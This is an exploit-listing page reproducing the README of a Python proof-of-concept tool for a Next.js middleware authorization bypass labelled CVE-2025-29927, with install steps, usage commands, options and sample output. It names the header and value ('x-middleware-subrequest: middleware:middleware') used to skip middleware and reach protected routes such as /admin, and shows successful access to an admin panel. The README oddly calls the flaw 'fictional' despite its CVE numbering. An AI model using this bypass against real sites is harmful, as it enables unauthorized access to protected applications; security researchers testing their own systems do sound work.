Sploitus

Exploit for PoC-for-Next.js-Middleware

kitploit Β· 2026-08-31

Exploit Code

MARKDOWN114 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M2HCZ-POC-FOR-NEXT.JS-MIDDLEWARE
# PoC for Next.js Middleware Bypass (CVE-2025-29927)

![Python Version](https://img.shields.io/badge/python-3.7+-blue.svg) ![Status](https://img.shields.io/badge/status-active-brightgreen.svg)

This is a **proof-of-concept** for a **fictional** Next.js middleware bypass vulnerability (CVE-2025-29927). Use **only** for educational and authorized security research.

* * *

## πŸš€ Features

Feature| Description  
---|---  
✨ Color & Verbose| Color-coded output; `-v` for detailed debug logs.  
πŸ“¦ OOP Structure| Class-based design for clarity and maintainability.  
🌐 Proxy Support| Route traffic through HTTP(S) proxies via `--proxy`.  
πŸͺ Session Handling| Persistent `requests.Session` for cookies & connection reuse.  
🚦 Redirect Control| No-follow-redirect by default; clearly detects pass vs. fail.  
πŸ›  Custom Headers| Override `User-Agent`, `x-middleware-subrequest`, or add headers.  
  
* * *

## ⚑ Installation

root@kitploit:~
    
    
    # Clone repository
    git clone https://github.com/your-username/nextjs-middleware-poc.git
    cd nextjs-middleware-poc
    
    # (Optional) Create virtual environment
    python3 -m venv .venv
    source .venv/bin/activate
    
    # Install dependencies
    pip install -r requirements.txt
    

> **Requires** Python 3.7+

* * *

## 🎯 Usage

root@kitploit:~
    
    
    python poc.py [options] <host>[:port]
    

Option| Description  
---|---  
`-p, --path PATH`| Protected route path (default: `/admin`)  
`-s, --scheme {http,https}`| Protocol (default: `http`)  
`--header HEADER`| `x-middleware-subrequest` header value (default: `middleware:middleware`)  
`-ua, --user-agent AGENT`| Custom `User-Agent` (default: `Mozilla/5.0`)  
`--proxy PROXY`| HTTP(S) proxy URL (e.g., `http://127.0.0.1:8080`)  
`-v, --verbose`| Enable debug output  
`-h, --help`| Show this help message  
  
* * *

## πŸ” Examples

### 1\. Basic Test

root@kitploit:~
    
    
    python poc.py localhost:3000
    

### 2\. HTTPS & Custom Path

root@kitploit:~
    
    
    python poc.py example.com -s https -p /dashboard
    

### 3\. Proxy & Verbose

root@kitploit:~
    
    
    python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v
    

* * *

## βœ… Expected Output

**Success**

root@kitploit:~
    
    
    [*] Target URL: http://localhost:3000/admin
    [+] SUCCESS: Middleware bypassed β€” access granted!
    --- Response Snippet ---
    <!DOCTYPE html><html>…<title>Admin Panel</title>…
    

**Failure**

root@kitploit:~
    
    
    [*] Target URL: http://localhost:3000/admin
    [-] FAIL: Access denied by middleware (302 Redirect)
    

* * *